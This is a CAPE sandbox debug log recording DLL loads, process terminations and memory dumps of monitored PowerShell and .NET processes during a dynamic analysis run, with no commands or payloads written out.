2019-08-13 23:41:21,720 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:21,736 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:21,736 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:21,736 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:21,736 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:21,750 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\2132_1014680753211214382019
2019-08-13 23:41:21,750 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:21,766 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:21,766 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:21,766 [root] DEBUG: Error 2 (0x2) - savePeFileToDisk: There was a problem renaming the file: The system cannot find the file specified.
2019-08-13 23:41:21,782 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:21,782 [root] DEBUG: Error 2 (0x2) - savePeFileToDisk: There was a problem deleting the file: C:\Users\user\AppData\Local\Temp\CapeOutput.bin: The system cannot find the file specified.
2019-08-13 23:41:21,782 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:21,782 [root] INFO: Notified of termination of process with pid 2132.
2019-08-13 23:41:21,782 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:21,798 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:21,798 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:21,798 [root] INFO: Notified of termination of process with pid 2208.
2019-08-13 23:41:21,813 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:21,828 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:21,828 [root] DEBUG: DLL loaded at 0x000007FEEE420000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:21,859 [root] DEBUG: DLL loaded at 0x000000001D130000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:21,859 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:21,875 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:21,875 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:21,907 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:21,907 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:21,907 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:21,907 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:21,907 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:21,923 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:21,953 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:21,953 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:21,970 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:21,970 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:21,984 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:22,016 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:22,016 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:22,032 [root] INFO: Process with pid 2132 has terminated
2019-08-13 23:41:22,032 [root] INFO: Process with pid 2952 has terminated
2019-08-13 23:41:22,032 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:22,032 [root] INFO: Process with pid 624 has terminated
2019-08-13 23:41:22,094 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:22,094 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1628
2019-08-13 23:41:22,094 [root] DEBUG: GetHookCallerBase: thread 2320 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:22,109 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:22,109 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:22,109 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:22,109 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:22,109 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:22,125 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:22,125 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:22,141 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1628_562296762421214382019
2019-08-13 23:41:22,141 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:22,141 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:22,157 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:22,157 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:22,157 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:22,157 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:22,171 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:22,171 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:22,171 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:22,171 [root] INFO: Notified of termination of process with pid 1628.
2019-08-13 23:41:22,187 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1544
2019-08-13 23:41:22,187 [root] DEBUG: GetHookCallerBase: thread 1460 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:22,187 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:22,219 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:22,219 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:22,219 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:22,250 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1544_1131154158221214382019
2019-08-13 23:41:22,250 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:22,250 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:22,250 [root] INFO: Notified of termination of process with pid 1544.
2019-08-13 23:41:22,328 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:22,344 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:22,344 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:22,359 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:22,359 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0F89DDCRI5G2QC12KTBO.temp'
2019-08-13 23:41:22,375 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:22,375 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0F89DDCRI5G2QC12KTBO.temp'
2019-08-13 23:41:22,391 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-08-13 23:41:22,391 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:22,391 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0F89DDCRI5G2QC12KTBO.temp'
2019-08-13 23:41:22,405 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:22,405 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP'
2019-08-13 23:41:22,405 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:22,405 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:22,421 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:22,421 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:22,421 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp" does not exist, skip.
2019-08-13 23:41:22,437 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:22,437 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:22,437 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:22,437 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp" does not exist, skip.
2019-08-13 23:41:22,453 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:22,453 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:22,453 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:22,546 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:22,562 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:22,562 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2056
2019-08-13 23:41:22,562 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:22,562 [root] DEBUG: GetHookCallerBase: thread 1220 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:22,578 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:22,578 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:22,578 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:22,578 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:22,578 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:22,594 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:22,594 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\2056_1747317906421214382019
2019-08-13 23:41:22,594 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:22,608 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:22,608 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:22,640 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:22,640 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:22,640 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:22,655 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:22,655 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:22,655 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:22,671 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:22,671 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:22,671 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:22,671 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:22,671 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:22,687 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:22,687 [root] INFO: Notified of termination of process with pid 2056.
2019-08-13 23:41:22,703 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:22,703 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1560
2019-08-13 23:41:22,703 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:22,703 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\C2L4RYQ1YV2T42SO3QLN.temp'
2019-08-13 23:41:22,717 [root] DEBUG: GetHookCallerBase: thread 2772 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:22,733 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\C2L4RYQ1YV2T42SO3QLN.temp'
2019-08-13 23:41:22,733 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:22,733 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:22,780 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-08-13 23:41:22,780 [root] DEBUG: DLL loaded at 0x000007FEED730000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:22,780 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:22,796 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:22,796 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\C2L4RYQ1YV2T42SO3QLN.temp'
2019-08-13 23:41:22,828 [root] DEBUG: DLL loaded at 0x000000001D1C0000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:22,842 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:22,842 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:22,842 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:22,842 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP'
2019-08-13 23:41:22,858 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:22,858 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:22,858 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:22,858 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:22,874 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:22,890 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:22,890 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp" does not exist, skip.
2019-08-13 23:41:22,890 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:22,890 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:22,890 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:22,890 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:22,890 [root] DEBUG: DLL loaded at 0x000007FEED730000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:22,905 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:22,905 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1560_58893278221214382019
2019-08-13 23:41:22,905 [root] DEBUG: DLL loaded at 0x000000001D0D0000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:22,921 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:22,921 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp" does not exist, skip.
2019-08-13 23:41:22,921 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:22,921 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:22,937 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:22,937 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:22,937 [root] INFO: Notified of termination of process with pid 1560.
2019-08-13 23:41:22,937 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:22,937 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:22,951 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:22,967 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:22,967 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:22,983 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:22,999 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:22,999 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9ZOG3AYK6S7RIC8L0R98.temp'
